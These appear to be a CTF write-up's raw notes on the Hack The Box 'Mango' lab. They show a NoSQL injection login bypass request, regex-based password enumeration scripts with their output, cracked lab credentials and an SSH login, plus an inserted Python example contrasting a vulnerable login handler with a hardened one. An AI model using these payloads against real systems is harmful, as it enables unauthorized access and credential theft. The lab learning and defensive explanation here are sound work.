2 :80 :443
https://mango.htb/ | https://staging-order.mango.htb/
Google-like page, but Mango
| username top-right: MrR3boot
https://mango.htb/analytics.php
analytics page
| *.codepen.io v2.9.8
# no exploits found.
http://mango.htb/
Forbidden
You don't have permission to access this resource
http://staging-order.mango.htb/
login page for ordering mangoes
# default creds not working
# mongo injection via burp
POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://staging-order.mango.htb
Referer: http://staging-order.mango.htb/
Cookie: PHPSESSID=3e6uhh8orqhor6rq1en790ks4l

username=admin&password[$ne]=admin&login=login
# works > http://staging-order.mango.htb/home.php
| please email: admin@mango.htb
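Added example, not part of the original notes or the target's code: a Python model of why the request above logs in, next to a login handler that only accepts string fields. The user record, the function names and the small stand-in for MongoDB matching are assumptions made for illustration.

```python
from urllib.parse import parse_qsl
import re

# Constructed user record; the real collection and its fields are assumptions.
USERS = [{"username": "admin", "password": "constructed-secret"}]

def php_style_params(body):
    """Parse a form body the way PHP fills $_POST: key[sub]=v becomes a nested dict."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]+)\]", key)
        if m:
            name, sub = m.groups()
            if not isinstance(params.get(name), dict):
                params[name] = {}
            params[name][sub] = value
        else:
            params[key] = value
    return params

def field_matches(stored, cond):
    """Stand-in for MongoDB matching: plain equality, plus $ne and $regex."""
    if not isinstance(cond, dict):
        return stored == cond
    checks = {"$ne": lambda v: stored != v,
              "$regex": lambda v: re.search(v, stored) is not None}
    return all(op in checks and checks[op](v) for op, v in cond.items())

def find_user(query):
    return next((u for u in USERS
                 if all(field_matches(u.get(k), c) for k, c in query.items())), None)

def login_vulnerable(body):
    p = php_style_params(body)
    # Request values go straight into the query, so a dict is read as an operator.
    return find_user({"username": p.get("username"), "password": p.get("password")})

def login_hardened(body):
    p = php_style_params(body)
    user, pw = p.get("username"), p.get("password")
    # Accept only plain strings; arrays built from bracket syntax are rejected.
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    return find_user({"username": user, "password": pw})
```

The same type check also blocks the regex-based enumeration used further down, since those requests rely on the field arriving as an array rather than a string.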
Using https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
$ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login -m POST
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
2 username(s) found:
admin
mango
Using https://book.hacktricks.xyz/pentesting-web/nosql-injection#brute-force-login-usernames-and-passwords-from-post-login
# modifying code
url = "http://staging-order.mango.htb/"
headers = {"Host": "staging-order.mango.htb"}
cookies = {"PHPSESSID": "mo1lred4k522pj016skrbru2oc"}
$ python exploit.py
Found username starting with a
^ad
^adm
^admi
^admin
Found username: admin
Found username starting with m
^ma
^man
^mang
^mango
Found username: mango
Extracting password of admin
Found password t9KcS3>!0B#2 for username admin
Extracting password of mango
Found password h3mXK8RhU~f{]f5H for username mango
# ssh mango:h3mXK8RhU~f{]f5H works
$ ssh mango@10.10.10.162
mango@mango:~$ whoami;id;hostname
mango
uid=1000(mango) gid=1000(mango) groups=1000(mango)
mango